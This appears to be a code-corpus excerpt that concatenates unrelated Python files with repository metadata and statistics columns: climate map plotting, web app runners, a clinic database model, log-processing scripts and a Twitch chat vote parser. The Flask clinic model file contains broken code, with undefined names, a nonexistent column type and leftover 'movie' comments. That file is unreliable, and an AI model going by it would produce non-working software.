fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_80_df.plot(ax=ax,column='avg_daily_max_air_temp_80',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 80 (1979-2011)')
above_80_path = os.path.join(cd,r'simple_maps','above_80.png')
plt.savefig(above_80_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days over 85
above_85_data = extremes[['fips','avg_daily_max_air_temp_85']].copy()
above_85_data['fips'] = above_85_data['fips'].astype(str)
above_85_data['fips'] = above_85_data['fips'].str.zfill(5)
above_85_df = pd.merge(county_map,above_85_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_85_df.plot(ax=ax,column='avg_daily_max_air_temp_85',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 85 (1979-2011)')
above_85_path = os.path.join(cd,r'simple_maps','above_85.png')
plt.savefig(above_85_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days over 90
above_90_data = extremes[['fips','avg_daily_max_air_temp_90']].copy()
above_90_data['fips'] = above_90_data['fips'].astype(str)
above_90_data['fips'] = above_90_data['fips'].str.zfill(5)
above_90_df = pd.merge(county_map,above_90_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_90_df.plot(ax=ax,column='avg_daily_max_air_temp_90',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 90 (1979-2011)')
above_90_path = os.path.join(cd,r'simple_maps','above_90.png')
plt.savefig(above_90_path,bbox_inches='tight',dpi=300)
plt.clf()
#Days over 95
above_95_data = extremes[['fips','avg_daily_max_air_temp_95']].copy()
above_95_data['fips'] = above_95_data['fips'].astype(str)
above_95_data['fips'] = above_95_data['fips'].str.zfill(5)
above_95_df = pd.merge(county_map,above_95_data,on='fips',how='inner')
fig, ax = plt.subplots(1, figsize=(8.5,6.5))
ax.axis('off')
cmap = plt.get_cmap('bwr')
above_95_df.plot(ax=ax,column='avg_daily_max_air_temp_95',legend=True,linewidth=0.2,edgecolor='gray',cmap=cmap)
plt.title('Average # of Days w/ a Max. Air Temp. Above 95 (1979-2011)')
above_95_path = os.path.join(cd,r'simple_maps','above_95.png')
plt.savefig(above_95_path,bbox_inches='tight',dpi=300)
plt.clf()
| 46.52795 | 111 | 0.742357 | 1,421 | 7,491 | 3.659395 | 0.082336 | 0.061538 | 0.046154 | 0.041538 | 0.789231 | 0.753462 | 0.671538 | 0.662692 | 0.490577 | 0.422692 | 0 | 0.061402 | 0.065145 | 7,491 | 160 | 112 | 46.81875 | 0.681137 | 0.021893 | 0 | 0.285714 | 0 | 0 | 0.243195 | 0.058815 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2ab276f6ec20b0fb998feea7021ff85c9eeb034 | 267 | py | Python | geosolver/utils/run_utils.py | mhrmm/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 83 | 2015-09-14T13:50:42.000Z | 2022-03-12T10:24:38.000Z | geosolver/utils/run_utils.py | nehamjadhav/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 8 | 2021-07-21T09:55:42.000Z | 2022-02-15T02:31:47.000Z | geosolver/utils/run_utils.py | nehamjadhav/geosolver | 13ae2972c58d5ba4c4878576f9fba8569cc99629 | [
"Apache-2.0"
] | 33 | 2015-06-16T18:52:43.000Z | 2021-12-16T08:58:27.000Z | from geosolver.utils.prep import sentence_to_words_statements_values
__author__ = 'minjoon'
def test_prep():
paragraph = r"If \sqrt{x+5}=40.5, what is x+5?"
print(sentence_to_words_statements_values(paragraph))
if __name__ == "__main__":
test_prep()
| 20.538462 | 68 | 0.737828 | 39 | 267 | 4.487179 | 0.666667 | 0.114286 | 0.171429 | 0.285714 | 0.354286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02193 | 0.146067 | 267 | 12 | 69 | 22.25 | 0.745614 | 0 | 0 | 0 | 0 | 0 | 0.17603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.285714 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2acfa3f100f471cb018a58688403a1ea15d30e0 | 620 | py | Python | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 3 | 2016-08-20T06:02:01.000Z | 2019-06-23T09:17:42.000Z | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 6 | 2016-07-30T12:42:29.000Z | 2021-04-18T14:33:40.000Z | server/run.py | henri-hulski/morepath_cerebral_todomvc | 568ac277c1844c4cf28bbacf484940f779fc7407 | [
"BSD-3-Clause"
] | 2 | 2020-09-10T08:07:13.000Z | 2020-09-30T21:15:49.000Z | import morepath
import webob
from webob.static import DirectoryApp, FileApp
from .app import App
def run(): # pragma: no cover
morepath.autoscan()
index = FileApp("static/index.html")
static = DirectoryApp("static")
app = App()
@webob.dec.wsgify
def morepath_with_static_absorb(request):
popped = request.path_info_pop()
if popped == "api":
return request.get_response(app)
elif popped == "static":
return request.get_response(static)
else:
return request.get_response(index)
morepath.run(morepath_with_static_absorb)
| 24.8 | 47 | 0.658065 | 73 | 620 | 5.438356 | 0.438356 | 0.098237 | 0.120907 | 0.18136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246774 | 620 | 24 | 48 | 25.833333 | 0.850107 | 0.025806 | 0 | 0 | 0 | 0 | 0.053156 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2b310f9a9e968bfd962741bff36ead21f4ffc0f | 8,629 | py | Python | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | backend/flask/apiks_flask_API.py | yasenn/apiks | a5c780d9747a57ab3991b869fcb8cee74b658d99 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from settings import *
import json
from api import api
db = SQLAlchemy(app)
class Session_list(db.Model):
__tablename__ = 'Session_list' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
client_id = db.Column(db.Integer, nullable=False)
# nullable is false so the column can't be empty
clinic_id = db.Column(db.Integer, nullable=False)
doctor_id = db.Column(db.Integer, nullable=False)
date_of_visit = db.Column(db.date_time_obj, nullable=False)
price_list_id = db.Column(db.Integer, nullable=False)
# You may decorate your operation with @swagger.operation
class Session_list(db.Model):
"get_session_list"
@swagger.operation(
notes='Get list of sessions',
responseClass=ModelClass.__name__,
nickname='session_list',
parameters=[ ],
responseMessages=[
{
"code": 200,
"message": "List of sessions"
},
{
"code": 405,
"message": "Invalid input"
},
{
"code": 503,
"message": "Server error"
}
]
)
def json(self):
return {'id': self.id, 'client_id': self.clinic_id,
'clinic_id': self.clinic_id, 'doctor_id': self.doctor_id, 'date_of_visit': self.date_of_visit, 'price_list_id': self.price_list_id}
def add_session_list(_client_id, _clinic_id, _doctor_id, _date_of_visit, _price_list_id):
'''function to add movie to database using _title, _year, _genre
as parameters'''
# creating an instance of our Movie constructor
new_session_list = session_list(client_id=_client_id, clinic_id=_clinic_id, doctor_id=_doctor_id, date_of_visit=_date_of_visit, price_list_id=_price_list_id)
db.session.add(new_session_list) # add new movie to database session
db.session.commit() # commit changes to session
class Price_list(db.Model):
"get price list"
@swagger.operation(
notes='Get price list ',
responseClass=ModelClass.__name__,
nickname='session_list',
parameters=[ ],
responseMessages=[
{
"code": 200,
"message": "Price List "
},
{
"code": 405,
"message": "Invalid input"
},
{
"code": 503,
"message": "Server error"
}
]
)
__tablename__ = 'Price_list' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
service = db.Column(db.String(30), nullable=False)
# nullable is false so the column can't be empty
price = db.Column(db.Integer, nullable=False)
doctor_position_id = db.Column(db.Integer, nullable=False)
def json(self):
return {'id': self.id, 'service': self.service,
'price': self.price, 'doctor_position_id': self.doctor_position_id}
class Pet_medical_card(db.Model):
"get_session_list"
@swagger.operation(
notes='Get list of sessions',
responseClass=ModelClass.__name__,
nickname='session_list',
parameters=[ ],
responseMessages=[
{
"code": 200,
"message": "List of sessions"
},
{
"code": 405,
"message": "Invalid input"
},
{
"code": 503,
"message": "Server error"
}
]
)
__tablename__ = 'Pet_medical_card' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
doctor_id = db.Column(db.Integer, nullable=False)
# nullable is false so the column can't be empty
pet_id = db.Column(db.Integer, nullable=False)
info = db.Column(db.String(1000), nullable=False)
date_of_visit = db.Column(db.date_time_obj, nullable=False)
def json(self):
return {'id': self.id, 'doctor_id': self.doctor_id,
'pet_id': self.pet_id, 'info': self.info, 'date_of_visit': self.date_of_visit}
class Doctor(db.Model):
__tablename__ = 'doctor' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
name = db.Column(db.String(30), nullable=False)
# nullable is false so the column can't be empty
doctor_position_id = db.Column(db.Integer, nullable=False)
phone = db.Column(db.String(13), nullable=False)
clinic_id = db.Column(db.Integer, nullable=False)
cabinet = db.Column(db.Integer, nullable=False)
def json(self):
return {'id': self.id, 'name': self.name,
'doctor_position_id': self.doctor_position_id, 'phone': self.phone, 'clinic_id': self.clinic_id, 'cabinet': self.cabinet}
class Clinic(db.Model):
__tablename__ = 'clinic' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
address = db.Column(db.String(50), nullable=False)
# nullable is false so the column can't be empty
schedule_clinic = db.Column(db.String(20), nullable=False)
phone = db.Column(db.String(20), nullable=False)
def json(self):
return {'id': self.id, 'address': self.address,
'schedule_clinic': self.schedule_clinic, 'phone': self.phone}
class Doctor_position(db.Model):
__tablename__ = 'doctor_position' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
position = db.Column(db.String(20), nullable=False)
# nullable is false so the column can't be empty
def json(self):
return {'id': self.id, 'position': self.position,}
class Pet(db.Model):
__tablename__ = 'pet' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
pet_type_id = db.Column(db.Integer, nullable=False)
# nullable is false so the column can't be empty
name = db.Column(db.String(30), nullable=False)
client_id = db.Column(db.Integer, nullable=False)
age = db.Column(db.Integer, nullable=False)
def json(self):
return {'id': self.id, 'pet_type_id': self.pet_type_id,
'name': self.name, 'client_id': self.client_id, 'age': self.age}
def add_pet(_pet_type_id, _name, _client_id, _age):
'''function to add movie to database using _title, _year, _genre
as parameters'''
# creating an instance of our Movie constructor
new_pet = Movie(pet_type_id=_pet_type_id, name=_name, client_id=_client_id, age=_age)
db.session.add(new_pet) # add new movie to database session
db.session.commit() # commit changes to session
def get_all_pets():
'''function to get all movies in our database'''
return [pet.json(pet) for pet in pet.query.all()]
def get_pet(_name):
'''function to get movie using the id of the movie as parameter'''
return [pet.json(pet.query.filter_by(name=_name).first())]
# Movie.json() coverts our output to the json format defined earlier
# the filter_by method filters the query by the id
# since our id is unique we will only get one result
# the .first() method will get that first value returned
class Client(db.Model):
__tablename__ = 'client' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
name = db.Column(db.String(30), nullable=False)
# nullable is false so the column can't be empty
phone = db.Column(db.String(13), nullable=False)
email = db.Column(db.String(30), nullable=False)
user_role_id = db.Column(db.Integer, nullable=False)
def json(self):
return {'id': self.id, 'name': self.name,
'phone': self.phone, 'email': self.email, 'user_role': self.user_role}
class User_role(db.Model):
__tablename__ = 'user_role' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
role = db.Column(db.String(15), nullable=False)
# nullable is false so the column can't be empty
def json(self):
return {'id': self.id, 'role': self.role}
class Pet_type(db.Model):
__tablename__ = 'pet_type' # creating a table name
id = db.Column(db.Integer, primary_key=True) # this is the primary key
type = db.Column(db.String(30), nullable=False)
# nullable is false so the column can't be empty
def json(self):
return {'id': self.id, 'type': self.type}
| 39.222727 | 165 | 0.6302 | 1,171 | 8,629 | 4.453459 | 0.118702 | 0.062895 | 0.078619 | 0.081496 | 0.704698 | 0.679962 | 0.655417 | 0.58907 | 0.539597 | 0.516012 | 0 | 0.009027 | 0.255418 | 8,629 | 219 | 166 | 39.401826 | 0.802646 | 0.166995 | 0 | 0.458333 | 0 | 0 | 0.104465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017857 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2b3a4f96b0e5c0cc51f531b031322f6a5514c13 | 260 | py | Python | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | 1 | 2019-09-24T05:28:34.000Z | 2019-09-24T05:28:34.000Z | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | null | null | null | examples.py | ramazanpolat/bittrex | 0667fd671a01f7769a36fb712000dcb064af074e | [
"MIT"
] | null | null | null | from bittrex import Bittrex
b = Bittrex(apikey='<YOUR_APIKEY>', secret='<YOUR_SECRET', understood='understood')
err, balances = b.get_balances_dict()
if not err:
for coin, balance_info in balances.items():
print(f'Coin:{coin} - {balance_info}')
| 26 | 83 | 0.703846 | 36 | 260 | 4.916667 | 0.611111 | 0.124294 | 0.169492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 260 | 9 | 84 | 28.888889 | 0.800905 | 0 | 0 | 0 | 0 | 0 | 0.242308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2cc3151348ddad3c0f9db09fa2c0d1acd52a95b | 7,379 | py | Python | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | 11 | 2017-02-25T00:01:58.000Z | 2020-08-11T18:44:35.000Z | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | 1 | 2016-10-20T16:01:57.000Z | 2016-10-21T11:30:40.000Z | tools/QueryAnalysis.py | Wikidata/QueryAnalysis | 2ae7b6226a3ce6a7ebccd3deff0ddd9460d4aa57 | [
"Apache-2.0"
] | null | null | null | import argparse
import calendar
from datetime import datetime
import glob
import os
import shutil
import subprocess
import sys
import gzip
import unifyQueryTypes
from utility import utility
import config
os.nice(19)
months = {'january': [1, 31],
'february': [2, 28],
'march': [3, 31],
'april': [4, 30],
'may': [5, 31],
'june': [6, 30],
'july': [7, 31],
'august': [8, 31],
'september': [9, 30],
'october': [10, 31],
'november': [11, 30],
'december': [12, 31]}
parser = argparse.ArgumentParser("This script extracts the raw log data (if "
+ "it was not already done), processes them"
+ " using the java application and unifies "
+ "the query types.")
parser.add_argument("--ignoreLock", "-i", help="Ignore locked file and "
+ "execute anyways", action="store_true")
parser.add_argument("--threads", "-t", default=6, type=int, help="The number "
+ "of threads to run the java program with (default 7).")
parser.add_argument("--logging", "-l", help="Enables file logging.",
action="store_true")
parser.add_argument("--noBotMetrics", "-b", help="Disables metric calculation"
+ " for bot queries.", action="store_true")
parser.add_argument("--noDynamicQueryTypes", "-d", help="Disables dynamic "
+ "generation of query types.", action="store_true")
parser.add_argument("--noGzipOutput", "-g", help="Disables gzipping of the "
+ "output files.", action="store_true")
parser.add_argument("--noExampleQueriesOutput", "-e", help="Disables the "
+ "matching of example queries.", action="store_true")
parser.add_argument("--withUniqueQueryDetection", "-u", help="Enable unique query detection", action="store_true")
parser.add_argument("--dbLocation", "-p", type = str, default = config.dbLocation, help = "The path of the uniqueQueriesMapDb file.")
parser.add_argument("--queryTypeMapLocation", "-q", type = str, default = config.queryTypeMapDbLocation, help = "The path of the query type map db file. Default is in the working directory.")
parser.add_argument("--monthsFolder", "-m", default=config.monthsFolder,
type=str,
help="The folder in which the months directory are "
+ "residing.")
parser.add_argument("--year", "-y", default=datetime.now().year, type=int,
help="The year to be processed (default current year).")
parser.add_argument("months", type=str, help="The months to be processed")
# These are the field we extract from wmf.wdqs_extract that form the raw
# log data. They are not configurable via argument because the java program
# does not detect headers and thus depends on this specific order.
fields = ["uri_query", "uri_path", "user_agent", "ts", "agent_type",
"hour", "http_status"]
header = ""
for field in fields:
header += field + "\t"
header = header[:-1] + "\n"
if (len(sys.argv[1:]) == 0):
parser.print_help()
parser.exit()
args = parser.parse_args()
if calendar.isleap(args.year):
months['february'][1] = 29
for monthName in args.months.split(","):
if os.path.isfile(utility.addMissingSlash(args.monthsFolder)
+ utility.addMissingSlash(monthName) + "locked") \
and not args.ignoreLock:
print "ERROR: The month " + monthName + " is being edited at the " \
+ "moment. Use -i if you want to force the execution of this script."
sys.exit()
month = utility.addMissingSlash(os.path.abspath(utility.addMissingSlash(args.monthsFolder)
+ utility.addMissingSlash(monthName)))
processedLogDataDirectory = month + "processedLogData/"
rawLogDataDirectory = month + "rawLogData/"
tempDirectory = rawLogDataDirectory + "temp/"
# If the month directory does not exist it is being created along with
# the directories for raw and processed log data.
if not os.path.exists(month):
print("Starting data extraction from wmf.wdqs_extract for "
+ monthName + ".")
os.makedirs(month)
os.makedirs(processedLogDataDirectory)
os.makedirs(rawLogDataDirectory)
# For each day we send a command to hive that extracts all entries for
# this day (in the given month and year) and writes them to temporary
# files.
for day in xrange(1, months[monthName][1] + 1):
arguments = ['hive', '-e']
os.makedirs(tempDirectory)
hive_call = 'insert overwrite local directory \'' + tempDirectory \
+ '\' row format delimited fields terminated ' \
+ 'by \'\\t\' select '
# We add all the fields to the request
for field in fields:
hive_call += field + ", "
hive_call = hive_call[:-2] + " "
hive_call += ' from wmf.wdqs_extract where uri_query<>"" ' \
+ 'and year=\'' + str(args.year) + '\' and month=\'' \
+ str(months[monthName][0]) + '\' and day=\'' + str(day) + '\''
arguments.append(hive_call)
if subprocess.call(arguments) != 0:
print("ERROR: Raw data for month " + monthName + " does not "
+ "exist but could not be extracted using hive.")
sys.exit(1)
# The content of the temporary files is then copied to the actual
# raw log data file (with added headers)
with gzip.open(rawLogDataDirectory + "QueryCnt"
+ "%02d"%day + ".tsv.gz", "wb") as dayfile:
dayfile.write(header)
for filename in glob.glob(tempDirectory + '*'):
with open(filename) as temp:
for line in temp:
dayfile.write(line)
shutil.rmtree(tempDirectory)
# We build the call to execute the java application with the location of
# the files, the number of threads to use and any optional arguments needed
mavenCall = ['mvn', 'exec:java@QueryAnalysis']
mavenArguments = '-Dexec.args=-w ' + month + ' -t ' + str(args.threads) + ' -p ' + args.dbLocation + " -q " + args.queryTypeMapLocation
if args.logging:
mavenArguments += " -l"
if args.noBotMetrics:
mavenArguments += " -b"
if args.noDynamicQueryTypes:
mavenArguments += " -d"
if args.noGzipOutput:
mavenArguments += " -g"
if args.noExampleQueriesOutput:
mavenArguments += " -e"
if args.withUniqueQueryDetection:
mavenArguments += " -u"
mavenCall.append(mavenArguments)
owd = os.getcwd()
os.chdir("..")
print "Starting data processing using QueryAnalysis for " + monthName + "."
if subprocess.call(['mvn', 'clean', 'package']) != 0:
print "ERROR: Could not package the java application."
sys.exit(1)
if subprocess.call(mavenCall) != 0:
print("ERROR: Could not execute the java application. Check the logs "
+ "for details or rerun this script with -l to generate logs.")
sys.exit(1)
os.chdir(owd) | 41.455056 | 191 | 0.594525 | 842 | 7,379 | 5.166271 | 0.339667 | 0.026897 | 0.050805 | 0.033793 | 0.111724 | 0.086437 | 0.049655 | 0 | 0 | 0 | 0 | 0.011707 | 0.282288 | 7,379 | 178 | 192 | 41.455056 | 0.809668 | 0.102317 | 0 | 0.037313 | 0 | 0 | 0.282862 | 0.017547 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.089552 | null | null | 0.052239 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c2d6007285ad5baf17afd7f3508cd8c9cfc4ca53 | 395 | py | Python | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | 2 | 2017-10-29T12:00:11.000Z | 2019-03-12T15:09:09.000Z | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | null | null | null | setup.py | mindis/timeseries2redis | 346eef859e59f8d55f4aeb817a3498376733ac36 | [
"MIT"
] | 2 | 2019-03-12T15:09:13.000Z | 2019-10-30T18:28:43.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
VERSION = '0.1'
#
import sys
import os
from setuptools import setup, find_packages
from setuptools.extension import Extension
setup(name='timeseries2redis',
version=VERSION,
description='timeseries2redis',
author='trbck',
packages=find_packages(),
package_data={'timeseries2redis': ['timeseries2redis.py']},
)
| 20.789474 | 65 | 0.686076 | 42 | 395 | 6.380952 | 0.642857 | 0.104478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021605 | 0.179747 | 395 | 18 | 66 | 21.944444 | 0.805556 | 0.106329 | 0 | 0 | 0 | 0 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c2dd0edce0a1e833af3074a49d8d489a149cfe83 | 1,381 | py | Python | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | null | null | null | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | 5 | 2019-11-01T16:23:27.000Z | 2021-06-10T19:12:25.000Z | src/mealspot/urls.py | OrenBen-Meir/Meal-Spot | 0b4d331f1094dda0487be2f04b08cb12e20fa1ae | [
"MIT"
] | null | null | null | """mealspot URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import include, path
from django.views.generic import RedirectView
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('customer/', include('customer.urls')),
path('cook/', include('cook.urls')),
path('deliverer/', include('deliverer.urls')),
path('home/', include('home.urls')),
path('manager/', include('manager.urls')),
path('salesperson/', include('salesperson.urls')),
path('', RedirectView.as_view(url='home/', permanent=True)), # '/' redirects to /home
path('accounts/', include('django.contrib.auth.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 41.848485 | 89 | 0.704562 | 190 | 1,381 | 5.084211 | 0.352632 | 0.057971 | 0.015528 | 0.024845 | 0.1853 | 0.1853 | 0.07764 | 0 | 0 | 0 | 0 | 0.006774 | 0.144823 | 1,381 | 32 | 90 | 43.15625 | 0.811177 | 0.469225 | 0 | 0 | 0 | 0 | 0.22865 | 0.033058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3125 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c2e1d261b6a1d00a086bc3055c588a8dbc743bea | 4,220 | py | Python | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 6 | 2018-02-23T16:16:12.000Z | 2020-12-27T18:00:31.000Z | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 4 | 2017-09-21T14:31:27.000Z | 2017-10-26T23:11:34.000Z | webapp/parse_vod_info.py | sesic/stockstream.live | eb58e8522d30e75350236c614fa2584fccc04173 | [
"MIT"
] | 3 | 2020-09-14T23:28:25.000Z | 2021-07-27T18:16:03.000Z | import sys
import json
import datetime
import stockstream
import os
records = []
i = 0
files = os.listdir("rechat")
for f in files:
"""if i < 3:
i += 1
continue"""
records += json.loads(open("rechat/" + f).read())
print "Loaded {} now have {} records.".format(f, len(records))
i += 1
if i > 10:
pass#break
date_to_votes = {}
for record in records:
if 'attributes' not in record:
continue
timestamp = record['attributes']['timestamp']
from_user = record['attributes']['from']
message = record['attributes']['message'].encode('utf-8').lstrip().rstrip()
if not message.startswith("!buy ") and not message.startswith("!sell "):
continue
fields = message.split(" ")
if len(fields) != 2:
continue
action = fields[0][1:].upper()
parameter = fields[1].upper()
time_str = datetime.datetime.fromtimestamp(timestamp / 1000).strftime('%m-%d-%Y %H:%M:%S')
date_str = datetime.datetime.fromtimestamp(timestamp / 1000).strftime('%m-%d-%Y')
# print "{} {}: {}".format(time_str, from_user, message)
if date_str not in date_to_votes:
date_to_votes[date_str] = []
date_to_votes[date_str].append({
"username": "twitch:" + from_user,
"action": action,
"parameter": parameter,
"timestamp": timestamp
})
#print "{} entries in date_to_votes.".format(len(date_to_votes))
date_to_objects = {}
total_orders = 0
order_id_to_order = {}
for date in date_to_votes:
orders = stockstream.api.get_orders_by_date(date)
fixed_orders = []
i = 0
while i < len(orders) - 1:
this_order = orders[i]
next_order = orders[i + 1]
same_side = next_order['side'].lower() == this_order['side'].lower()
same_symbol = next_order['symbol'].lower() == this_order['symbol'].lower()
if this_order['state'] == 'cancelled' and next_order['state'] == 'filled' and same_side and same_symbol:
next_order['timestamp'] = this_order['timestamp']
i += 2
fixed_orders.append(next_order)
else:
fixed_orders.append(this_order)
i += 1
fixed_orders = [order for order in fixed_orders if order['state'] == 'filled']
total_orders += len(fixed_orders)
for order in fixed_orders:
order_id_to_order[order['id']] = order
votes = date_to_votes[date]
print "{} - {} votes {} orders".format(date, len(votes), len(fixed_orders))
objects = [] + fixed_orders + votes
sorted_objects = sorted(objects, key=lambda k: k['timestamp'])
date_to_objects[date] = sorted_objects
orphan_orders = 0
matched_orders = 0
order_to_votes = {}
for date in date_to_votes:
player_to_vote = {}
print "{} orphan orders.".format(orphan_orders)
objects = date_to_objects[date]
for obj in objects:
if 'id' in obj:
resp_votes = []
for player in player_to_vote:
votes = player_to_vote[player]
for vote in votes:
if vote['action'].lower() == obj['side'].lower() and vote['parameter'].lower() == obj['symbol'].lower():
diff = obj['timestamp'] - vote['timestamp']
if diff > 0 and diff < 600000:
resp_votes.append(vote)
if len(resp_votes) <= 0:
orphan_orders += 1
#print "For order {} have {} voters:\n{}.".format(obj, len(resp_votes), resp_votes)
else:
matched_orders += 1
order_to_votes[obj['id']] = resp_votes
else:
if obj['username'] not in player_to_vote:
player_to_vote[obj['username']] = []
player_to_vote[obj['username']].append(obj)
